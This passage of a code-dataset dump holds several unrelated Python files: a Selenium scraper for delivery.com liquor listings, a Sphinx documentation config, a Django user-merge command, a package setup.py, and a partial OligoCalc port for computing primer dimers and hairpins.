tree.xpath('//ul[contains(@id ,\"product_list\")]/li'):\n if not li.xpath('.//a/@href'):\n continue\n produrl = li.xpath('//a/@href')[0]\n produrl = parse_qs(urlsplit(produrl).query)['url'][0] if 'url' in parse_qs(urlsplit(produrl).query) else produrl\n products[produrl] = {\n 'pdct_name_on_eretailer': clean_xpathd_text(li.xpath('.//a[contains(@id, \"ProductTitleLink\")]/text()')),\n 'volume': clean_xpathd_text(li.xpath('.//a[contains(@id, \"ProductTitleLink\")]//text()')),\n 'raw_price': clean_xpathd_text(li.xpath('.//div[@class=\"alineacion\"]//text()')[:2]),\n 'raw_promo_price': clean_xpathd_text(li.xpath('./zzzzzzzzzz')),\n 'pdct_img_main_url': \"\".join(li.xpath('.//div[@class=\"product-image-container\"]//img/@src')),\n }\n products[produrl]['brnd'] = brm.find_brand(products[produrl]['pdct_name_on_eretailer'])['brand']\n print(products[produrl], produrl)\n products[produrl]['price'] = getprice(products[produrl]['raw_price'])\n products[produrl]['promo_price'] = getprice(products[produrl]['raw_promo_price'])\n products[produrl]['pdct_img_main_url'] = clean_url(products[produrl]['pdct_img_main_url'], root_url)\n print(products[produrl])\n\n searches[kw].append(produrl)\n return searches, products\n\n\nkw_parsing(exple_kw_page_path, kw_test, test_searches, test_products)\n\n###################\n# # PDCT page xpathing #\n###################\nexple_pdct_page_path = op.join(TEST_PAGES_FOLDER_PATH, shop_id, 'pdct_page_test.html') # TODO: store the file\n# exple_pdct_page_path = \"/code/mhers/cache/w_9/isetan/pdct/<クリュッグ>ロゼ ハーフサイズ-page0.html\"\ntest_url, test_products = '', {'': {}}\n\n\ndef pdct_parsing(fpath, url, products): # TODO : modify xpaths\n tree = etree.parse(open(fpath), parser=parser)\n products[url].update({\n 'volume': clean_xpathd_text(tree.xpath('(//div[@class=\"col-xs-6 col-sm-12 nopadding pull-right\"]//text())[23]')),\n 'pdct_img_main_url': clean_url(''.join(tree.xpath('//span[@id=\"view_full_size\"]//img/@src')), root_url),\n 'ctg_denom_txt': ' '.join(tree.xpath('//div[@class=\"breadcrumb clearfix\"]//text()')),\n })\n return products\n\npdct_parsing(exple_pdct_page_path, test_url, test_products)\n\n###################\n# # CTG scrapping #\n###################\n\nurls_ctgs_dict = {\n 'whisky': 'https://www.delivery.com/search/alcohol/liquor/whiskey?address=NEW%20YORK,%20NY',\n 'champagne': 'https://www.delivery.com/search/alcohol/wine/sparkling?address=NEW%20YORK,%20NY',\n 'cognac': 'https://www.delivery.com/search/alcohol/liquor/brandy-cognac?address=NEW%20YORK,%20NY',\n 'sparkling': 'https://www.delivery.com/search/alcohol/wine/sparkling?address=NEW%20YORK,%20NY',\n 'vodka': 'https://www.delivery.com/search/alcohol/liquor/vodka?address=NEW%20YORK,%20NY',\n# 'still_wines': '',\n 'gin': 'https://www.delivery.com/search/alcohol/liquor/gin?address=NEW%20YORK,%20NY',\n# 'tequila': '',\n 'red_wine': 'https://www.delivery.com/search/alcohol/wine/red?address=NEW%20YORK,%20NY',\n 'white_wine': 'https://www.delivery.com/search/alcohol/wine/white?address=NEW%20YORK,%20NY',\n 'rum': 'https://www.delivery.com/search/alcohol/liquor/rum?address=NEW%20YORK,%20NY',\n 'bourbon': 'https://www.delivery.com/search/alcohol/liquor/featured-liquor?address=NEW%20YORK,%20NY',\n 'brandy': 'https://www.delivery.com/search/alcohol/liquor/brandy-cognac.brandy?address=NEW%20YORK,%20NY',\n 'liquor': 'https://www.delivery.com/search/alcohol/liquor/featured-liquor?address=NEW%20YORK,%20NY',\n}\n\n\n# Category Scraping - with selenium - multiple pages per category (click on next page)\nfor ctg, url in urls_ctgs_dict.items():\n categories[ctg] = []\n number_of_pdcts_in_ctg = 0\n\n for p in range(100):\n fpath = fpath_namer(shop_id, 'ctg', ctg, p)\n\n if not op.exists(fpath):\n driver.get(url.format(page=p+1))\n sleep(2)\n driver.save_page(fpath, scroll_to_bottom=True)\n categories, products = ctg_parsing(fpath, ctg, categories, products)\n\n if len(set(categories[ctg])) == number_of_pdcts_in_ctg:\n break\n else:\n number_of_pdcts_in_ctg = len(set(categories[ctg]))\n print(ctg, url, p, len(categories[ctg]))\n\n\n######################################\n# # KW searches scrapping ############\n######################################\n\n# KW searches Scraping - with requests - one page per search\nkw_search_url = \"\" # TODO : modify URL\nfor kw in keywords:\n searches[kw] = []\n number_of_pdcts_in_kw_search = 0\n if not op.exists(fpath_namer(shop_id, 'search', kw, 0)):\n driver.get(kw_search_url.format(kw=kw, page=1))\n\n for p in range(1):\n fpath = fpath_namer(shop_id, 'search', kw, p)\n if not op.exists(fpath):\n sleep(2)\n driver.smooth_scroll()\n driver.save_page(fpath, scroll_to_bottom=True)\n searches, products = kw_parsing(fpath, kw, searches, products)\n\n print(kw, len(searches[kw]))\n\n######################################\n# # Product pages scraping ###########\n######################################\n\n# Download the pages - with selenium\nfor url in sorted(list(set(products))):\n d = products[url]\n if d['brnd'] in mh_brands:\n print(d['pdct_name_on_eretailer'], d['volume'])\n url_mod = clean_url(url, root_url=root_url)\n\n fpath = fpath_namer(shop_id, 'pdct', d['pdct_name_on_eretailer'], 0)\n if not op.exists(fpath):\n driver.get(url_mod)\n sleep(2)\n driver.save_page(fpath, scroll_to_bottom=True)\n products = pdct_parsing(fpath, url, products)\n print(products[url])\n\n\n######################################\n# # Download images ###########\n######################################\n# Download images\nfrom ers import download_img\n\nfor url, pdt in products.items():\n if 'pdct_img_main_url' in pdt and pdt['pdct_img_main_url'] and brm.find_brand(pdt['pdct_name_on_eretailer'])['brand'] in mh_brands:\n print(pdt['pdct_name_on_eretailer'] + \".\" + pdt['pdct_img_main_url'].split('.')[-1])\n orig_img_path = img_path_namer(shop_id, pdt['pdct_name_on_eretailer'])\n img_path = download_img(pdt['pdct_img_main_url'], orig_img_path, shop_id=shop_id, decode_content=False, gzipped=False, debug=False)\n if img_path:\n products[url].update({'img_path': img_path, 'img_hash': file_hash(img_path)})\n\ncreate_csvs(products, categories, searches, shop_id, fpath_namer(shop_id, 'raw_csv'), COLLECTION_DATE)\nvalidate_raw_files(fpath_namer(shop_id, 'raw_csv'))\ncheck_products_detection(shop_id, fpath_namer(shop_id, 'raw_csv'), shop_inventory_lw_csv)\ndriver.quit()\n","sub_path":"spiders/delivery_com_2019.py","file_name":"delivery_com_2019.py","file_ext":"py","file_size_in_byte":10711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"179713078","text":"# -*- coding: utf-8 -*-\n#\n# This file is execfile()d with the current directory set\n# to its containing dir.\n\nimport os\nimport sys\n\ntry:\n import nengo_extras\n import guzzle_sphinx_theme\nexcept ImportError:\n print(\"To build the documentation, nengo_extras and guzzle_sphinx_theme \"\n \"must be installed in the current environment. Please install these \"\n \"and their requirements first. A virtualenv is recommended!\")\n sys.exit(1)\n\nextensions = [\n 'sphinx.ext.autodoc',\n 'sphinx.ext.autosummary',\n 'sphinx.ext.githubpages',\n 'sphinx.ext.intersphinx',\n 'sphinx.ext.mathjax',\n 'sphinx.ext.todo',\n 'sphinx.ext.viewcode',\n 'guzzle_sphinx_theme',\n 'numpydoc',\n 'nengo.utils.docutils',\n 'nbsphinx',\n 'nbsphinx_link',\n]\n\n# -- sphinx.ext.autodoc\nautoclass_content = 'both' # class and __init__ docstrings are concatenated\nautodoc_default_flags = ['members']\nautodoc_member_order = 'bysource' # default is alphabetical\n\n# -- sphinx.ext.intersphinx\nintersphinx_mapping = {\n 'nengo': ('https://www.nengo.ai/nengo/', None),\n 'numpy': ('https://docs.scipy.org/doc/numpy', None),\n 'scipy': ('https://docs.scipy.org/doc/scipy/reference', None),\n}\n\n# -- sphinx.ext.todo\ntodo_include_todos = True\n\n# -- numpydoc\nnumpydoc_show_class_members = False\n\n# -- nbsphinx\nnbsphinx_timeout = -1\n\n# -- sphinx\nexclude_patterns = ['_build']\nsource_suffix = '.rst'\nsource_encoding = 'utf-8'\nmaster_doc = 'index'\n\n# Need to include https Mathjax path for sphinx < v1.3\nmathjax_path = (\"https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.3/\"\n \"config/TeX-AMS-MML_HTMLorMML.js\")\n\nproject = u'Nengo Extras'\nauthors = u'Applied Brain Research'\ncopyright = nengo_extras.__copyright__\nversion = '.'.join(nengo_extras.__version__.split('.')[:2]) # Short X.Y version\nrelease = nengo_extras.__version__ # Full version, with tags\npygments_style = 'default'\n\n# -- Options for HTML output --------------------------------------------------\n\npygments_style = \"sphinx\"\ntemplates_path = [\"_templates\"]\nhtml_static_path = [\"_static\"]\n\nhtml_theme_path = guzzle_sphinx_theme.html_theme_path()\nhtml_theme = \"guzzle_sphinx_theme\"\n\nhtml_theme_options = {\n \"project_nav_name\": \"Nengo extras %s\" % (version,),\n \"base_url\": \"https://www.nengo.ai/nengo-extras\",\n}\n\nhtml_title = \"Nengo extras {0} docs\".format(release)\nhtmlhelp_basename = 'Nengo extras'\nhtml_last_updated_fmt = '' # Suppress 'Last updated on:' timestamp\nhtml_show_sphinx = False\n\n# -- Options for LaTeX output -------------------------------------------------\n\nlatex_elements = {\n 'papersize': 'letterpaper',\n 'pointsize': '11pt',\n # 'preamble': '',\n}\n\nlatex_documents = [\n # (source start file, target, title, author, documentclass [howto/manual])\n ('index', 'nengo_extras.tex', html_title, authors, 'manual'),\n]\n\n# -- Options for manual page output -------------------------------------------\n\nman_pages = [\n # (source start file, name, description, authors, manual section).\n ('index', 'nengo_extras', html_title, [authors], 1)\n]\n\n# -- Options for Texinfo output -----------------------------------------------\n\ntexinfo_documents = [\n # (source start file, target, title, author, dir menu entry,\n # description, category)\n ('index', 'nengo_extras', html_title, authors, 'Nengo',\n 'Lesser used features for Nengo', 'Miscellaneous'),\n]\n","sub_path":"docs/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":3379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"40975362","text":"import shortuuid\nfrom allauth.account.models import EmailAddress\nfrom django.core.management.base import BaseCommand\nfrom django.db import transaction\nfrom django_super_deduper.merge import MergedModelInstance\n\nfrom accounts.models import Account\nfrom projects.models.projects import Project\nfrom users.models import User\n\n\nclass Command(BaseCommand):\n \"\"\"\n A management command to merge users.\n\n This may be necessary when a user has signed in using different methods\n e.g. using Google and username/password. There are some mechanisms to\n avoid duplication in these instances. But this script allows for de-duplication\n where this has not been successful.\n\n Use with caution, testing and checking!\n\n Example usage:\n\n # Merge users \"foo\" and \"bar\" into user \"baz\"\n ./venv/bin/python3 manage.py merge_users baz foo bar\n \"\"\"\n\n help = \"Merges users for de-duplication purposes.\"\n\n def add_arguments(self, parser):\n \"\"\"\n Add arguments for this command.\n \"\"\"\n parser.add_argument(\n \"primary_username\", type=str, help=\"The user to merge other user data into.\"\n )\n parser.add_argument(\n \"secondary_usernames\",\n nargs=\"+\",\n type=str,\n help=\"The other users to merge into the primary user.\",\n )\n\n @transaction.atomic\n def handle(self, *args, **options):\n \"\"\"\n Handle the command (ie. execute it).\n \"\"\"\n primary_username = options[\"primary_username\"]\n secondary_usernames = options[\"secondary_usernames\"]\n\n self.stdout.write(\n self.style.WARNING(\n \"Are you sure you want to merge users {secondary} into user {primary}? \"\n \"This will delete {secondary}. (y/n)\".format(\n primary=primary_username, secondary=\", \".join(secondary_usernames)\n )\n )\n )\n if input(\"> \") != \"y\":\n self.stdout.write(self.style.WARNING(\"Cancelled.\"))\n return\n\n # To avoid clashes in project names (which will cause them to be dropped)\n # check for duplicate project names attached to the users personal account\n # and append a unique string to any duplicates\n existing_names = Project.objects.filter(\n account__user__username=primary_username\n ).values_list(\"name\", flat=True)\n secondary_projects = Project.objects.filter(\n account__user__username__in=secondary_usernames\n )\n for project in secondary_projects:\n if project.name in existing_names:\n project.name += \"-\" + shortuuid.ShortUUID().random(length=8)\n project.save()\n\n # Merge the users' personal accounts\n primary_account = Account.objects.get(user__username=primary_username)\n secondary_accounts = Account.objects.filter(\n user__username__in=secondary_usernames\n )\n MergedModelInstance.create(\n primary_account, secondary_accounts, keep_old=False,\n )\n\n # To avoid a user having more than one primary email, set all emails\n # for secondary users to primary=False\n EmailAddress.objects.filter(user__username__in=secondary_usernames).update(\n primary=False\n )\n\n # Merge the users\n primary_user = User.objects.get(username=primary_username)\n secondary_users = User.objects.filter(username__in=secondary_usernames)\n MergedModelInstance.create(primary_user, secondary_users, keep_old=False)\n\n self.stdout.write(self.style.SUCCESS(\"Succeeded.\"))\n","sub_path":"manager/users/management/commands/merge_users.py","file_name":"merge_users.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"80276682","text":"import os\r\nimport fnmatch\r\nfrom setuptools import find_packages, setup\r\nfrom setuptools.command.build_py import build_py as build_py_orig\r\n\r\n# modules to exclude\r\nexcluded = ['afcpy/myutils.py']\r\n\r\nclass build_py(build_py_orig):\r\n \"\"\"\r\n determines which modules to include or exclude\r\n \r\n source: https://stackoverflow.com/questions/35115892/how-to-exclude-a-single-file-from-package-with-setuptools-and-setup-py\r\n \"\"\"\r\n \r\n def find_package_modules(self, package, package_dir):\r\n modules = super().find_package_modules(package, package_dir)\r\n return [(pkg, mod, file) for (pkg, mod, file) in modules if not any(fnmatch.fnmatchcase(file, pat=pattern) for pattern in excluded)]\r\n \r\ndef generate_manifest():\r\n \"\"\"\r\n generates the manifest file\r\n \"\"\"\r\n \r\n pkg_dir = os.path.abspath(find_packages()[0])\r\n data_dir = os.path.join(pkg_dir,'data')\r\n data_files = []\r\n \r\n for root,folders,files in os.walk(data_dir):\r\n for file in files:\r\n afp = os.path.join(root,file)\r\n rfp = 'afcpy/data'+afp.split('afcpy/data')[-1]\r\n if file.startswith('tb'):\r\n data_files.append(rfp)\r\n elif file == 'log.xlsx':\r\n log_file = rfp\r\n else:\r\n continue\r\n \r\n src_dir = os.path.dirname(os.path.abspath(find_packages()[0]))\r\n manifest = os.path.join(src_dir,'MANIFEST.in')\r\n \r\n with open(manifest,'w') as fopen:\r\n for data_file in data_files:\r\n fopen.write('include {}\\n'.format(data_file))\r\n fopen.write('include {}\\n'.format(log_file))\r\n\r\ndef collect_dependencies():\r\n \"\"\"\r\n collects the dependencies from the requirements.txt file\r\n \"\"\"\r\n \r\n pkg_dir = os.path.abspath(find_packages()[0])\r\n git_dir = os.path.dirname(pkg_dir)\r\n req_file = os.path.join(git_dir,'requirements.txt')\r\n \r\n with open(req_file) as req_file_open:\r\n dependencies = [line.rstrip('\\n') for line in req_file_open.readlines()]\r\n \r\n return dependencies\r\n\r\n# generate the manifest\r\ngenerate_manifest()\r\n \r\n# collect the dependencies\r\ndependencies = collect_dependencies() \r\n\r\n# run setup\r\nsetup(name='afcpy',\r\n version=\"1.0.2\",\r\n author='Josh Hunt',\r\n author_email='hunt.brian.joshua@gmail.com',\r\n description=\"\",\r\n url=\"https://github.com/jbhunt/afcpy\",\r\n cmdclass={'build_py': build_py},\r\n packages=find_packages(),\r\n include_package_data=True,\r\n install_requires=dependencies,\r\n classifiers=[\"Programming Language :: Python :: 3\",\r\n \"License :: OSI Approved :: MIT License\",\r\n \"Operating System :: OS Independent\",\r\n ],\r\n )\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"353361083","text":"#!/usr/bin/env python3\nfrom OligoCalc import Input\nfrom OligoCalc import Start\nfrom OligoCalc import MakeComplement\nfrom sys import argv\n# from datetime import datetime\n\n\n# GLOBALS\n\ndebugHairpin = 0\ndebugDimers = 0\ndoTiming = 0\ntheAlignedArray = 0\ntheHairpinArray = 0\nminAlignLen = 0\nminHairpinLen = 0\nmaxMismatchNum = 1\n# hairpins must have this many bases between self-annealed sequences\nbubbleSize = 3\n\n\ndef calcDegeneratePrimers(theOligo, theComplement):\n if (not theOligo.hasIUpacBase):\n return\n\n global broadMatch\n broadMatch = True # True: do all degenerate comparisons\n calculateMatrices(theOligo, theComplement)\n # anchorString = \"-----------------------------
    -----------------------------
    <\\/FONT>\"\n # doc.write(anchorString.anchor(\"allMatches\"))\n\n # doc.write(\"Your oligo contains degenerated bases.
    \")\n # doc.write(\"This section displays all potential matches <\\/FONT>in the case of degenerated bases.
    \")\n # doc.write(\"For Example:
       'N' matches 'A','T','G','C', or 'N';
    'R' matches 'T','C','S','N';
    'W' matches 'A','T','W','N'; etc.<\\/PRE>

    \")\n # hrefString = \"view strict matches only\"\n # doc.writeln(\n # \"Scroll up to view strict Matches<\\/a> <\\/FONT>\")\n\n # if (!isCompatible) {\n # doc.write(\"

    Sorry, the hairpin loop calculation is only available if you are using IE or Netscape 4.x or higher!!\\n<\\/B>
    \")\n # } else {\n # doc.writeln(displayHairpin(theHairpinArray, theOligo.Sequence))\n # }\n print(display3EndDimer(theOligo, theAlignedArray))\n print(displayAllDimers(theAlignedArray, theOligo.Sequence, theOligo.revSequence))\n\n\ndef calculateMatrices(theOligo, theComplement):\n # var theStart = datetime.now()\n if (len(theOligo.Sequence) != len(theComplement.Sequence)):\n raise ValueError(\n \"Error! Primer and its complement are different lengths!\")\n\n # setup d*d matrix\n matrix = makeMatrix(len(theOligo.Sequence))\n\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calculateMatrices - makeMatrix took \" + (theEnd - theStart) + \" ms
    \")\n # theStart = datetime.now()\n\n # //populates the matrix\n\n fillMatchMatrix(theOligo.seqArray, theComplement.seqArray, matrix)\n\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calculateMatrices - fillMatchMatrix took \" + (theEnd - theStart) + \" ms
    \")\n # theStart = datetime.now()\n\n # if (isIE)\n # if (theAlignedArray) delete theAlignedArray\n\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calculateMatrices - delete theAlignedArray took \" + (theEnd - theStart) + \" ms
    \")\n # theStart = datetime.now()\n # //exam the matrix for 3 prime complementary\n\n global theAlignedArray\n global maxMismatchNum\n global minAlignLen\n theAlignedArray = makeAlignedArray(matrix, minAlignLen, maxMismatchNum)\n\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calculateMatrices - makeAlignedArray took \" + (theEnd - theStart) + \" ms
    \")\n # theStart = datetime.now()\n # delete matrix\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calculateMatrices - delete matrix took \" + (theEnd - theStart) + \" ms
    \")\n # theStart = datetime.now()\n # theAlignedArray = sortAlignedArray(theAlignedArray)\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calculateMatrices - sortAlignedArray took \" + (theEnd - theStart) + \" ms
    \")\n # theStart = datetime.now()\n # //exam the sequence for potential hairpins\n # if (isCompatible) {\n # if (isIE)\n # if (theHairpinArray) delete theHairpinArray\n # theHairpinArray = calcHairpin(theOligo.Sequence, minHairpinLen)\n # }\n global theHairpinArray\n global minHairpinLen\n theHairpinArray = calcHairpin(theOligo.Sequence, minHairpinLen)\n\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calculateMatrices - calcHairpin took \" + (theEnd - theStart) + \" ms
    \")\n\n\ndef calcHairpin(theFullSequence, minHairpinLength):\n # /* compare theCompSeq with theFullSeq starting at theFullSeq[startPos]. Successful matches must be at least minMatch long * /\n # /* The resulting array is an array of arrays. each result should be an array of 4 integers\n # result[0]: position of start of match in sequence\n # result[1]: position of end of match\n # result[2]: position of the start of the complement(really the end since it would be 3'-5')\n # result[3]: position of the end of the complement(really the start since it would be 3'-5')\n # */\n\n theFullComplement = MakeComplement(theFullSequence, True)\n theResults = []\n\n # if (debugHairpin) primerWin.document.write(\"

    \")\n    # if (debugHairpin) primerWin.document.write(\"calcHairpin: theFullSequence  =\" + theFullSequence + \"; theFullSequence.length=\" + theFullSequence.length + \"; minHairpinLen\" + minHairpinLen + \";
    \")\n # if (debugHairpin) primerWin.document.write(\"calcHairpin: theFullComplement=\" + theFullComplement + \"; theFullComplement.length=\" + theFullComplement.length + \";
    \")\n\n theResult = None\n # count = None\n compPos = None\n seqPos = None\n\n # // makes sure that we do not anneal the full length of the primer - that should come out in the dimerization report\n maxSeqLength = abs(len(theFullSequence) // 2) - bubbleSize\n maxMatch = 0\n\n # console.log(maxSeqLength)\n\n for compPos in range(len(theFullComplement) - 2 * minHairpinLength):\n maxMatch = 0\n for seqPos in range(len(theFullSequence) - maxSeqLength):\n # if (debugHairpin) primerWin.document.write(\"calcHairpin: compPos=\" + compPos + \"; seqPos=\" + seqPos + \";
    \")\n theResult = getIndexOf(\n theFullSequence[0:seqPos + maxSeqLength],\n theFullComplement[compPos:len(theFullComplement)],\n seqPos, minHairpinLength)\n if (theResult[0] > -1):\n # // theResult[0] is the index of the first match of theFullComplement that is of at least length minHairpinLength in theFullSequence\n # // theResult[1] is the length of the match\n\n theResults = DoHairpinArrayInsert(\n theResult[0],\n theResult[0] + theResult[1] - 1,\n len(theFullSequence) - compPos - theResult[1],\n len(theFullSequence) - compPos - 1,\n theResults\n )\n if (theResult[1] > maxMatch):\n maxMatch = theResult[1]\n # ; // move forward to guarantee nothing else is found that is a reasonable match\n seqPos = theResult[0] + theResult[1] - minHairpinLength\n if (seqPos + minHairpinLength >= maxSeqLength):\n # ; // move compPos forward to stop identical checks if long match was found!\n compPos += maxMatch - minHairpinLength\n break # ; // we have moved far enough on the primer to guarentee we have everything - further would give us the reverse match\n else:\n if (maxMatch > minHairpinLength):\n # ; // move compPos forward to stop identical checks if long match was found!\n compPos += maxMatch - minHairpinLength\n break # ; // not found in the rest of the sequence!\n # if (debugHairpin) primerWin.document.write(\"<\\/PRE>\")\n return theResults\n\n\ndef DoHairpinArrayInsert(a, b, c, d, results):\n arrayCount = len(results)\n if (a >= c or a >= b or c >= d or b >= c):\n # if (debugHairpin) primerWin.document.write(\"DoHairpinArrayInsert: ERROR IN VALUES PASSED! [0]=\" + a + \"; [1]=\" + b + \"[2]=\" + c + \"; [3]=\" + d + \";
    \\n\")\n return results\n\n for i in range(arrayCount):\n if (results[i][0] <= a and results[i][1] >= b and results[i][2] <= c and results[i][3] >= d):\n return results\n if (results[i][0] >= a and results[i][1] <= b and results[i][2] >= c and results[i][3] <= d):\n results[i][0] = a\n results[i][1] = b\n results[i][2] = c\n results[i][3] = d\n # if (debugHairpin) primerWin.document.write(\"DoHairpinArrayInsert: position \" + i + \" in results replaced with [0]=\" + a + \"; [1]=\" + b + \"[2]=\" + c + \"; [3]=\" + d + \";
    \")\n return results\n\n # results[arrayCount] = [0, 0, 0, 0]\n results.append([0, 0, 0, 0]) # MYMOD\n results[arrayCount][0] = a\n results[arrayCount][1] = b\n results[arrayCount][2] = c\n results[arrayCount][3] = d\n # if (debugHairpin) primerWin.document.write(\"DoHairpinArrayInsert: arrayCount=\" + arrayCount + \"; [0]=\" + a + \"; [1]=\" + b + \"[2]=\" + c + \"; [3]=\" + d + \";
    \")\n return results\n\n\ndef getIndexOf(seq, subSeq, startIndex, minMatch):\n # // look for subSeq in seq\n # / * returns an array where\n # theResult[0] is the index of the first match of subseq that is of at least length minMatch in seq\n # theResult[1] is the length of the match\n # * /\n theResult = [-1, -1]\n # theResult[0] = -1\n # theResult[1] = -1\n global broadMatch\n if (not broadMatch):\n for k in range(minMatch, len(subSeq)+1):\n # // can replace this with seq.search for GREP capabilities\n try:\n theMatch = seq.index(subSeq[0:k], startIndex)\n except ValueError:\n break\n theResult[0] = theMatch\n theResult[1] = k\n # if (debugHairpin) primerWin.document.write(\"(\" + theMatch + \",\" + k + \") \")\n else:\n for i in range(startIndex, len(seq)):\n if (isBaseEqual(seq[i], subSeq[0])):\n for j in range(len(subSeq)):\n if (not isBaseEqual(seq[i + j], subSeq[j])):\n break\n elif (j >= minMatch - 1):\n theResult[0] = theMatch\n theResult[1] = k\n if (j == subSeq.length):\n theResult[0] = theMatch\n theResult[1] = k\n # if (debugHairpin) primerWin.document.write(\"TheResult[0]=\" + theResult[0] + \" (first match); TheResult[1]=\" + theResult[1] + \";
    \")\n return theResult\n\n\ndef makeMatrix(matLength):\n return [[0 for _ in range(matLength)] for _ in range(matLength)]\n # var theMatrix = new Array(matLength)\n # for (var i=0\n # i < matLength\n # i++) {\n # // increment column\n # theMatrix[i] = new Array(matLength)\n # }\n # return theMatrix\n\n\ndef fillMatchMatrix(cols, rows, mat):\n d = len(cols)\n\n if (d < 4):\n return\n global broadMatch\n if (broadMatch):\n # // Do the degenerate thing!\n for i in range(d):\n # // increment column\n for j in range(d):\n # // increment row\n if (isBaseEqual(cols[i], rows[j])):\n mat[i][j] = 1\n if (i > 0 and j > 0):\n mat[i][j] += mat[i - 1][j - 1]\n # // (increment diagonal values)\n else:\n mat[i][j] = 0\n if (i > 1 and j > 1):\n if (mat[i - 1][j - 1] > mat[i - 2][j - 2] and mat[i - 1][j - 1] > 1 and i < d - 1 and j < d - 1):\n # // allow one base mismatch only if there are at least 2 matched base on 5' and at least 1 matched base on 3'\n mat[i][j] = mat[i - 1][j - 1]\n elif (i < d - 1 and j < d - 1):\n mat[i - 1][j - 1] = 0\n else:\n for i in range(2):\n for j in range(2):\n # // increment column\n # // increment row\n if (cols[i] == rows[j]):\n mat[i][j] = 1\n if (i and j):\n mat[i][j] += mat[i - 1][j - 1]\n # // (increment diagonal values)\n else:\n mat[i][j] = 0\n for i in range(2, d - 1):\n # // increment column\n for j in range(2, d - 1):\n # // increment row\n if (cols[i] == rows[j]):\n mat[i][j] = mat[i - 1][j - 1] + 1\n # // (increment diagonal values)\n else:\n mat[i][j] = 0\n if (mat[i - 1][j - 1] > 1 and cols[i + 1] == rows[j + 1]):\n # // allow one base mismatch only if there are at least 2 matched base on 5' and at least 1 matched base on 3'\n mat[i][j] = mat[i - 1][j - 1]\n i = d - 1\n j = i\n # // increment column\n # // increment row\n if (cols[i] == rows[j]):\n mat[i][j] = 1\n mat[i][j] += mat[i - 1][j - 1]\n # // (increment diagonal values)\n else:\n mat[i][j] = 0\n\n\ndef makeAlignedArray(mat, minLen, maxMisMatch):\n # // assumes an orthogonal matrix\n # /* theAlignedArray is a bit strange in the second dimension. Assume it is a length 5 array called 'theResults'\n # theResults[0] == start index\n # theResults[1] == start matching index in reverse complement seq\n # theResults[2] == end index of aligned bases (inclusive)\n # theResults[3] == end matching index in reverse complement Seq\n # theResults[4] == number of mismatches\n # */\n\n matLength = len(mat)\n count = 0\n theResults = []\n i = None\n j = None\n k = None\n mismatches = None\n for i in range(matLength):\n for j in range(matLength):\n if (mat[i][j] == 1): # //potential start of an alignment\n mismatches = 0\n hasMatch = 1\n lastMatch = 1\n maxInc = matLength - (j if i <= j else i)\n for k in range(1, maxInc):\n hasMatch = mat[i + k][j + k]\n if (not hasMatch):\n break\n if (hasMatch <= lastMatch):\n if (mismatches >= maxMisMatch):\n break\n mismatches += 1\n lastMatch = hasMatch\n\n if (k - mismatches >= minLen):\n if count == len(theResults):\n theResults.append(None)\n theResults[count] = [0, 0, 0, 0, 0]\n theResults[count][0] = i # ; //start index\n # ; //start matching index in reverse complement seq\n theResults[count][1] = j\n # ; //end index of aligned bases (inclusive)\n theResults[count][2] = i + k - 1\n # ; //end matching index in reverse complement Seq\n theResults[count][3] = j + k - 1\n theResults[count][4] = mismatches # ; //mismatch counts\n count += 1\n\n return theResults\n\n\ndef sortAlignedArray(alignedArray):\n # // assumes an orthogonal matrix\n # / * theAlignedArray is a bit strange in the second dimension. Assume it is a length 5 array called 'theResults'\n # theResults[0] == start index\n # theResults[1] == start matching index in reverse complement seq\n # theResults[2] == end index of aligned bases(inclusive)\n # theResults[3] == end matching index in reverse complement Seq\n # theResults[4] == number of mismatches\n # * /\n if (len(alignedArray) > 2):\n if (1 == 2):\n tempArray = [0, 0, 0, 0, 0]\n swapped = 0\n run_once = True\n # // bubble sort\n while (swapped == 1) or run_once:\n run_once = False\n swapped = 0\n for n in range(len(alignedArray) - 2):\n if (alignedArray[n][2] - alignedArray[n][0] < alignedArray[n + 1][2] - alignedArray[n + 1][0]):\n for i in range(5):\n tempArray[i] = alignedArray[n][i]\n alignedArray[n][i] = alignedArray[n + 1][i]\n alignedArray[n + 1][i] = tempArray[i]\n swapped = 1\n else:\n alignedArray = sorted(alignedArray, key=arrayOrder()) # MYMOD\n\n return alignedArray\n\n\ndef comparator(mycmp):\n class K:\n def __init__(self, obj, *args):\n self.obj = obj\n\n def __lt__(self, other):\n return mycmp(self.obj, other.obj) < 0\n\n def __gt__(self, other):\n return mycmp(self.obj, other.obj) > 0\n\n def __eq__(self, other):\n return mycmp(self.obj, other.obj) == 0\n\n def __le__(self, other):\n return mycmp(self.obj, other.obj) <= 0\n\n def __ge__(self, other):\n return mycmp(self.obj, other.obj) >= 0\n\n def __ne__(self, other):\n return mycmp(self.obj, other.obj) != 0\n\n return K\n\n\ndef arrayOrder():\n def mycmp(a, b):\n # //size plus position\n return (1 if ((a[2] - a[0]) < (b[2] - b[0])) else (-1 if ((a[2] - a[0]) > (b[2] - b[0])) else (a[0] - a[1]) - (b[0] - b[1])))\n\n return comparator(mycmp)\n\n\ndef isBaseEqual(c1, c2):\n if (c1 == c2):\n return True\n global broadMatch\n if (broadMatch):\n if (c1 == 'N' or c2 == 'N'):\n return True\n\n equA = \"AMRWVHD\"\n # // lack of 'M' caught by Paul Wayper. Thanks Paul!\n equT = \"TWYKHDB\"\n equG = \"GRSKVDB\"\n equC = \"CMSYVHB\"\n # // lack of 'M' caught by Paul Wayper. Thanks Paul!\n\n if (c1 == 'A'):\n try:\n equA.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'T'):\n try:\n equT.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'G'):\n 